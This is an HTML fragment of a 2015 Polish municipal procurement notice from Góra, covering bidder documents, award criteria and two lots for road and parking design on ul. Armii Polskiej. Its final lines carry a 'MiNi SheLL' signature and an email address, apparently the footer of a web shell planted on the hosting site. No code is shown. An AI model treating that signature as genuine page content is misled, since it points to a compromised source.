<ul class="kh_indent_1"><li><p>Do wykazania spełniania  warunku udziału w postępowaniu Zamawiający uzna za właściwe złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, wskazanych przez ustawodawcę w art. 22 ust. 1 ustawy Prawo zamówień publicznych ( t.j. Dz. U. z 2013 r., poz. 907 z późn. zm.).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zgodnie z opisem sposobu oceny spełniania warunku zawartym w pkt. III.3.2.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty wskazane w pkt 6 przedmiotowej SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przedłuży termin realizacji zamówienia, jeżeli dochowanie terminu stanie się dla Wykonawcy niemożliwe z przyczyn od niego niezależnych, o ściśle obiektywnym charakterze, a konieczność zmiany zostanie odpowiednio udokumentowana. Termin zostanie przedłużony o czas równy okresowi trwania przeszkody.
2.	Istotne zmiany umowy są możliwe w sytuacji  wystąpienia okoliczności zmierzających do prawidłowej realizacji przedmiotu umowy, obniżenia kosztów, zapewnienia optymalnych parametrów technicznych i jakościowych, optymalizacji efektu ekologicznego.
3.	Warunki zmian : 
a)	inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
b)	forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności.
Dokładny opis i warunki zmian zawarto w projekcie umowy stanowiącym załącznik do siwz</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gora.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Górze, ul. Mickiewicza 1, 56-200 Góra, pokój nr 111.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2015 godzina 12:00, miejsce: Urząd Miasta i Gminy w Górze, ul. Mickiewicza 1, 56-200 Góra, pokój nr 101- sekretariat, I piętro budynku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa drogi ul. Armii Polskiej w Górze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lokalizacja inwestycji:

Projekt objęty niniejszym wnioskiem jest realizowany na terenie miasta Góra . Planowana inwestycja rozpoczyna się na projektowanym skrzyżowaniu z ul. Mickiewicza, a kończy się na istniejącym skrzyżowaniu z ulicą Łąkową .
Planowana droga jest drogą gminną przebiegającą w granicach miasta Góra .

Projektowany zakres :
Opracowanie dokumentacji i uzyskanie uzgodnień branżowych dotyczących zaprojektowanej : drogi klasy L , konstrukcja jezdni wg kategorii ruchu KR-2 o nawierzchni asfaltowej szer. do 5.0 m , należy uwzględnić ściek z kostki wibroprasowanej szarej o szer. 30 cm  , jednostronny chodnik z masy asfaltowej o szerokości 2,00 m, zjazdy na posesje z masy asfaltowej ( 3-5 m),  włączenie do dróg gminnych ul. Mickiewicza i Łąkowej , kanalizacji deszczowej , oświetlenia ulicznego oraz przebudowa istniejącego oświetlenia ulicznego na włączeniu ulic Mickiewicza i Armii Polskiej , projektu stałej organizacji ruchu (oznakowanie pionowe i poziome), projektu tymczasowej organizacji ruchu na czas realizacji zadania w Zespole Uzgadniania Dokumentacji Projektowych oraz w jednostkach zarządzających sieciami urządzeń obcych i ruchem drogowym. 
Długość w/w drogi wynosi około 0,600 km ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 110.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wymiana nawierzchni drogi i przebudowa parkingu przy ul. Armii Polskiej w m. Góra - II etap.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lokalizacja inwestycji 

Projekt objęty niniejszym wnioskiem jest realizowany na terenie miasta Góra . Planowana inwestycja rozpoczyna się na istniejącym skrzyżowaniu ul. Starogórskiej z ul. Armii Polskiej , a kończy się na istniejącym skrzyżowaniu z ulicą Mickiewicza dz. nr 1871 , na wysokości wieży ciśnień istniejące rozgałęzienie dróg należy również ująć w tym zadaniu dz. nr 2059 i łączy się z ul. Mickiewicza . 
Planowana droga jest drogą gminną przebiegającą w granicach miasta Góra . 

Projektowany zakres 


Opracowanie dokumentacji wykonania nowej nawierzchni asfaltowej na ul. Armii Polskiej : droga klasy L , po dokonaniu wizji lokalnej i pomiarów poprzecznych jeżeli zaistnieje potrzeba należy przyjąć warstwę wyrównawczą np. 2-3 cm a następnie nową warstwę ścieralną o gr. 4 cm , należy uwzględnić ściek z kostki wibroprasowanej szarej o szer. 30 cm , projektu stałej organizacji ruchu (oznakowanie pionowe i poziome) na wysokości Domu Kultury należy przyjąć przejście dla pieszych z kostki betonowej  w  kolorze biało - czerwonym i wyniesionym ponad poziom ulicy 10-12 cm ( jako najazdowe ) , projektu tymczasowej organizacji ruchu na czas realizacji zadania .
Przebudowa parkingu  bez zmiany lokalizacji o nawierzchni z kostki betonowej gr. 8 cm koloru szarego z uwzględnieniem miejsca postojowego dla osoby niepełnosprawnej . 
Długość w/w drogi wynosi około 0,650 km ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 110.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com